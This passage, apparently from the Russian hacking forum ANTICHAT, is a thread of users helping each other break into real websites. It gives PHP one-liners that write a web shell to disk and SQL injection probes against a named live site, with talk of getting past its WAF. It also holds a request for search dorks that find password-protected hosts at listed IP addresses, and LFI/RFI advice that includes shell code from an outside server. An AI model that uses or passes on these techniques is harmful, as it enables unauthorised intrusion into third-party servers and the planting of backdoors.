ANTICHAT — форум по информационной безопасности, OSINT и технологиям

В случаях ,если IPTABLES strict's or allow_url_fopen=Off ->

file_put_contents('/path/shell.php',$_SERVE['HTTP_USER_AGENT']);

or

file_put_contents('/path/shell.php',$_POST['data']);

Почему то не могу раскрутить

http://studyguide.ru/labourexchange.php?act=view&sv=va_vacancy&id=780'

даже Havij не справился

посмотрите

там защита он инъекций, фильтруется union selectt, дальше не смотрел

и что больше нечего нельзя сделать?

http://studyguide.ru/labourexchange.php?act=view&sv=va_vacancy&id=780+a nd+1=1+group+by+40+--+

TRUE

Ну полей 40 - с этим бы будем считать, что определились...

Теперь надо обойти WAF

UPDATE Фильтруются скобки. Думаю - можешь забить на этот сайт...

Подскажите пожалуйста что прописать в google чтоб он выдал результаты на который требуеться авторизация как .htaccess?

Пример.

http://195.112.109.83/

http://79.170.27.106/

Незнал где задать вопрос написал здесь,если не правильно просьба модераторов переместить.Спасибо.

LFI уязвимость

include $_GET['include_path'] . '/include/some/file.php';

Нулл-символ экранируется. Версия PHP 5.2.17. Реально ли что-то с этим с делать?

Ну если я правильно то понял, то возможно RFI c условиями, что

1) allow_url_include = On

2) На своём сервере создать путь /include/some/file.php и в качестве file.php разместить шелл-код.

Вариант событий второй...

Юзать дальше LFI и добраться до любых логов при использовании альтернативы нулл-байта, например 4096 слэшей, почитать об этом можно тут

Google не индексирует такие страницы.

Всё достаточно просто.

Если есть возможность проинклудить файл с другого сервера:

http://site.com/shell.php?/include/some/file.php

Если такой возможности нет, то стоит обратить в первую очередь внимание на работу других функций с $_GET['include_path'], а они есть т.к. Null-байт вырезаеться и на _/thread98525.html